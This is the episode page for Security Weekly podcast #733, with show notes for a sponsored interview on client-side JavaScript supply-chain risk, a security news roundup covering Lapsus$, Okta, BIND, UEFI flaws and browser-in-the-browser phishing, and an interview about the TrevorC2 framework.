Critical infrastructure, Vulnerability management, Cybersecurity Asset Management, Security awareness, Third-party risk, Careers, Malware, Threat intelligence

PSW #733 – Stephen Ward, & David Kennedy

This week, we start the show off with an interview featuring Stephen Ward, the CMO of Source Defense, about Exposing the Shadows: Managing Shadow Code and the Blind Side in 3rd Party Risk! Next up, we jump into the Security News for this week: insiders inside NASA, BIND is in a bind again, Lapsus$ is on a tear, ripping at Microsoft and Okta, anonymous hacks printers, The UEFI security rabbit hole goes DEEP, Microtik and Tickbot, Browser-in-the-Browser attacks, Nestle gets attacked for not wanting to hurt babies, & just another sabotage! Finally, a pre-recorded interview featuring Dave Kennedy, where we discuss TrevorC2!

Segment Resources:

Our core whitepaper

https://info.sourcedefense.com/event/client-side-white-paper-2022?leadsource=White%20Paper

Blog on the blind side topic

https://sourcedefense.com/resources/blog/wheres-the-blind-side-in-your-3rd-party-risk-its-on-the-client-side/

Free risk report on attendee's web properties

https://sourcedefense.com/check-your-exposure/

This segment is sponsored by Source Defense.

Visit https://securityweekly.com/sourcedefense to learn more about them!

Visit https://www.securityweekly.com/psw for all the latest episodes!

Visit https://securityweekly.com/acm to sign up for a demo or buy our AI Hunter!

Follow us on Twitter: https://www.twitter.com/securityweekly

Like us on Facebook: https://www.facebook.com/secweekly

View Show Index

Full Audio

Segments

1. Managing Shadow Code & the Blind Side in 3rd Party Risk – Stephen Ward – PSW #733

With all of your focus and investment on 3rd party risk management, there is likely still a blind-side that remains unaddressed. It is an area that should be moved to the top of your priority list - both for its potential to cause material losses in the form of response costs and fines and judgements, and for the ease in which it can be mitigated. It is a risk introduced by the 3rd party vendors you rely upon (and the nth parties they work with) to power and enhance your website. The threat of JavaScript based attacks - click-jacking, digital skimming, formjacking, defacement, "Magecart" - exists for any organization collecting sensitive data or conducting transactions through their web properties. Attacks of this type have done damage to some of the biggest brands in the world - costing household names like British Airways tens of millions - and they happen by the hundreds per month. Already in 2022, we've seen headlines of major client-side attacks like the one that hit Segway - potentially impacting nearly a million consumers.

This is an area of exposure introduced through your own code, and by your partners, that can only be addressed at the client-side. It remains widely unaddressed, as focus in website security to this point has been on securing the server side.

Join us for an exploration of the threat of these attacks, real-world examples of the material impact they have caused, and dialogue on the approaches to mitigating this risk with pros and cons of each.

Segment Resources:

Our core whitepaper

https://info.sourcedefense.com/event/client-side-white-paper-2022?leadsource=White%20Paper

Blog on the blind side topic

https://sourcedefense.com/resources/blog/wheres-the-blind-side-in-your-3rd-party-risk-its-on-the-client-side/

Free risk report on attendee's web properties

https://sourcedefense.com/check-your-exposure/

This segment is sponsored by Source Defense. Visit https://securityweekly.com/sourcedefense to learn more about them

Announcements

  • Don't miss any of your favorite Security Weekly content! Visit https://securityweekly.com/subscribe to subscribe to any of our podcast feeds and have all new episodes downloaded right to your phone! You can also join our mailing list, Discord server, and follow us on social media & our streaming platforms!

Guest

Stephen Ward
Stephen Ward
CMO at Source Defense

Stephen Ward is CMO at Source Defense – the pioneer in client-side security. He has been with the firm since late 2021 and is responsible for all aspects of go to market. Stephen is a serial cyber security entrepreneur with a 25-year long career in Marketing. In his career, he has been fortunate enough to work for some of the most innovative, category creating companies in our space. He helped bring forensics to the forefront in his time at NetWitness, helped drive change in endpoint security while at Invincea, brought threat intelligence to the mainstream while at iSight Partners, drove real change in OT/ICS security while at Claroty, helped create the cyber risk quantification market while at RiskLens and through his work with the FAIR Institute. Don’t hold his title against him – he’s more than a Marketing person – he’s been dedicated to driving better outcomes for the good guys in cyber security for the majority of his career.

Hosts

Paul Asadoorian
Paul Asadoorian
Founder at Security Weekly
Josh Marpet
Josh Marpet
Executive Director at RM-ISAO

2. Baby Food, Lapsus$, Anonymous Vs. Printers, UEFI Rabbit Holes, & Browser-In-Browser – PSW #733

In the Security News: insiders inside NASA, BIND is in a bind again, Lapsus$ is on a tear, ripping at Microsoft and Okta, anonymous hacks printers, The UEFI security rabbit hole goes DEEP, Microtik and Tickbot, Browser-in-the-Browser attacks, Nestle gets attacked for not wanting to hurt babies, just another sabotage, & more!

Announcements

  • Do you have a specific guest or topic that you want us to cover on one of the shows? Submit your suggestions for guests by visiting https://securityweekly.com/guests and completing the form! We review suggestions monthly and will reach out to you once reviewed!

  • Don't forget to check out our library of on-demand webcasts & technical trainings at securityweekly.com/ondemand.

Hosts

Paul Asadoorian
Paul Asadoorian
Founder at Security Weekly
  1. 1. How We Discovered Vulnerabilities in CI/CD Pipelines of Popular Open-Source Projects – Cycode - Command injection for Github actions, yikes
  2. 2. Why We Haven’t Seen Debilitating Cyberwar in Ukraine - meh, lots of speculation: "One was that Russian hackers are not nimble enough to compromise Ukrainian targets during the invasion; a second was that stealthy cyberattacks aren’t that useful when compared to the damage that Russian troops are doing with missiles and bombs; and thirdly that Russian hackers are too busy protecting their own digital infrastructure."
  3. 3. High-Severity Vulnerabilities Patched in BIND Server - Looks like DoS-resulting vulnerabilities, though still could be useful to take out strategic DNS servers, if that's your thing.
  4. 4. Anonymous hacks unsecured printers to sends anti-war messages across Russia - I still can't understand why people make printers available on the Internet: "The printers were misconfigured, and manually forwarded on the Russian routers. In every case we have reviewed, the port was deliberately forwarded."
  5. 5. Over 200,000 MicroTik Routers Worldwide Are Under the Control of Botnet Malware - Crazy: "The disclosure also coincides with a new report from Microsoft, which revealed how the TrickBot malware has weaponized MikroTik routers as proxies for command-and-control communications with the remote servers, raising the possibility that the operators may have used the same botnet-as-a-service." Also, links to this in the article: https://eclypsium.com/2021/12/09/when-honey-bees-become-murder-hornets/
  6. 6. Exploring a New Class of Kernel Exploit Primitive – Microsoft Security Response Center
  7. 7. High-Severity UEFI Vulnerabilities Patched in Dell Enterprise Laptops - Yea: "These also prove that the majority of enterprise tools available for source code analysis are not suitable for pinpointing firmware-specific security defects. There are multiple reasons, one of the most obvious being the differences in implementations of the memory management functions compared to the non-firmware-specific software. This leads to a false sense of security when no vulnerabilities are detected at source code level." And yep: "Unfortunately, most outsourcing companies developing firmware code for major device vendors do not have product security teams or sometimes even a single employee dedicated to mitigating security risks" - So many examples too, like vendors going to market with a 7-year-old Linux kernel and binaries.... Better article too: https://binarly.io/posts/AMI_UsbRt_Repeatable_Failures_A_6_year_old_attack_vector_still_affecting_millions_of_enterprise_devices And also, these are like 6-year-old vulnerabilities: "Totally I discvoered three 0day vulnerabilities in NvmeSmm, SdioSmm and UsbRt drivers from AMI and one in ItkSmmVars driver from Intel. Vulnerabilities was reported to Intel at 15.07.2016 and after several working days both Intel and AMI confirmed all of the security issues. Intel decided to release a single advisory INTEL-SA-00057 to cover all four vulnerabilities:" (Ref: https://github.com/Cr4sh/Aptiocalypsis)
  8. 8. New Browser-in-the Browser (BITB) Attack Makes Phishing Nearly Undetectable - "Fortunately for us, replicating the entire window design using basic HTML/CSS is quite simple. Combine the window design with an iframe pointing to the malicious server hosting the phishing page, and its basically indistinguishable. The image below shows the fake window compared with the real window. Very few people would notice the slight differences between the two." Ref: https://mrd0x.com/browser-in-the-browser-phishing-attack/ - Also, I believe the pop-up window uses an image to fake the URL bar, which is an awesome trick (though I did not dig through the source to check if this is actually what its doing). UPDATE: Okay I looked at the source and yes, this is what its doing :)
  9. 9. Okta investigating claims of customer data breach from Lapsus$ group - Uh Oh: "Okta confirmed today they suffered a security incident in January when hackers compromised a laptop of one of its support engineers that could initiate password resets for customers. An investigation into the breach showed that the threat actors had access to the laptop for five days, during which they were able to access Okta's customer support panel and the company's Slack server." - What could you get from Slack and the support channel? https://www.bleepingcomputer.com/news/security/okta-confirms-25-percent-customers-impacted-by-hack-in-january/
  10. 10. Information About HubSpot’s March 18, 2022 Security Incident
  11. 11. Lapsus$ hackers leak 37GB of Microsoft’s alleged source code - Source code may not be my target at MS, backdoors in the update servers would be my personal favorite: "In a new blog post published tonight, Microsoft has confirmed that one of their employee's accounts was compromised by Lapsus$, providing limited access to source code repositories." Ref: https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-they-were-hacked-by-lapsus-extortion-group/
  12. 12. Anonymous released 10GB database of Nestlé - This is where the wild west approach gets messy: "Anonymous has called for a total boycott of Nestle products after the Swiss food conglomerate continued to supply essential goods to Russia despite mounting pressure from competitors to cut ties. In response to intense public pressure to cut ties with Russia in protest of its military assault on Ukraine, more than 400 multinational corporations have either partially or completely exited the country. Nestlé announced earlier this month that it would suspend all exports of its products from Russia except for essential items such as baby formula." - I mean, yea, baby formula.
  13. 13. OffSecOps: Using Jenkins For Red Team Tooling – HTTP418 InfoSec
  14. 14. Open Source Maintainer Sabotages Code to [NOT] Wipe Russian, Belarusian Computers - "RIAEvangelist told Motherboard in an email that “There was no actual code to wipe computers. It only puts a file on the desktop.” He then pointed to a Twitter account he said belonged to him and which had now been targeted by hackers."
Josh Marpet
Josh Marpet
Executive Director at RM-ISAO
Lee Neely
Lee Neely
Information Assurance APL at Lawrence Livermore National Laboratory
  1. 1. Most NASA Systems at Risk From Insider Threats: Audit - NASA’s Inspector General has concluded an audit of the agency’s information technology systems that found its classified platform has effective insider threat countermeasures. However, the agency’s unclassified systems (which do contain sensitive information) possess substantial insider threat risks and require attention.
  2. 2. Emotet malware campaign impersonates the IRS for 2022 tax season - The Emotet malware crew, reared its head in 2014 and has become the world’s most feared financial crime-oriented hacking group. They are ramping up their malware campaign as America’s tax season escalates. Their phishing emails emulate something that would be sent from the Internal Revenue Service, with malicious file attachments that the reader is urged to immediately open.
  3. 3. Exotic Lily initial access broker works with Conti gang - Researchers say they have linked the new initial access broker "Exotic Lily," which provides access to previously compromised entities, to operations being conducted by the "Conti" ransomware group. Exotic Lily is currently exploiting the Microsoft Windows MSHTML vulnerability (CVE-2021-40444) in phishing campaigns that have distributed more than 5,000 phishing emails per day targeting some 650 organization from around the world.
  4. 4. FBI: Avoslocker ransomware targets US critical infrastructure - The FBI, U.S. Treasury Department, and the Financial Crimes Enforcement Network (FinCEN) have issued a TLP:WHITE joint security advisory warning that the "AvosLocker" ransomware-as-a-service (RaaS) is being actively used in attacks targeting various U.S. critical infrastructure sectors.
  5. 5. High-Severity Vulnerabilities Patched in BIND Server - The Internet Systems Consortium (ISC) has released security updates to address three high-severity flaws (CVE-2022-0635, CVE-2022-0667, CVE-2021-25220) affecting the Berkeley Internet Name Domain (BIND) server software.
  6. 6. Anonymous leaked data stolen from Russian pipeline company Transneft - Anonymous hacked Omega Company, the in-house R&D unit of Transneft, the Russian oil pipeline giant, and leaked stolen data. Anonymous collective claims it has 79GB of stolen emails, and leaked those emails on the "Distributed Denial of Secrets" whistleblower site.
  7. 7. White House issues call to action in light of new intelligence on Russian cyberthreat - The Biden administration once again urged private sector firms to address known vulnerabilities and harden their cyber defenses given the increased possibility of Russian cyber attacks targeting U.S. critical infrastructure.
  8. 8. Microsoft investigating claims of hacked source code repositories - Microsoft has revealed it is now investigating claims from the "Lapsus$" data extortion gang that it breached Microsoft's internal Azure DevOps source code repositories on March 20 and stole data.
  9. 9. Okta investigating claims of customer data breach from Lapsus$ group - According to Lapsus$, it was able to steal "superuser/admin" access to Okta.com, which allowed it to access the customer data. Per CEO Todd McKinnon, "In late January 2022, Okta detected an attempt to compromise the account of a third party customer support engineer working for one of our subprocessors. The matter was investigated and contained by the subprocessor. We believe the screenshots shared online are connected to this January event. Based on our investigation to date, there is no evidence of ongoing malicious activity beyond the activity detected in January."

3. TrevorC2 – David Kennedy – PSW #733

Check out our latest interview with our good friend Dave Kennedy! When not pumping iron Dave is hard at work understanding and implementing C2 infrastructure. TrevorC2 is a really cool framework that allows for some pretty stealthy C2 communications. Tune-in to learn more!

Announcements

  • Do you have a specific guest or topic that you want us to cover on one of the shows? Submit your suggestions for guests by visiting https://securityweekly.com/guests and completing the form! We review suggestions monthly and will reach out to you once reviewed!

Guest

David Kennedy
David Kennedy
CEO at TrustedSec

David Kennedy is founder of Binary Defense and TrustedSec. Both organizations focus on the betterment of the security industry. David also served as a board of director for the ISC2 organization. David was the former CSO for a Diebold Incorporated where he ran the entire INFOSEC program. David is a co-author of the book “Metasploit: The Penetration Testers Guide”, the creator of the Social-Engineer Toolkit (SET), Artillery, Unicorn, PenTesters Framework, and several popular open source tools. David has been interviewed by several news organizations including CNN, Fox News, MSNBC, CNBC, Katie Couric, and BBC World News. David is the co-host of the social-engineer podcast and on several additional podcasts. David has testified in front of Congress on two occasions on the security around government websites. David is one of the founding authors of the Penetration Testing Execution Standard (PTES); a framework designed to fix the penetration testing industry. David was the co-founder of DerbyCon, a large-scale conference started in Louisville, Kentucky. Prior to the private sector, David worked for the United States Marine Corps and deployed to Iraq twice for intelligence related missions.

Hosts

Paul Asadoorian
Paul Asadoorian
Founder at Security Weekly
Josh Marpet
Josh Marpet
Executive Director at RM-ISAO
prestitial ad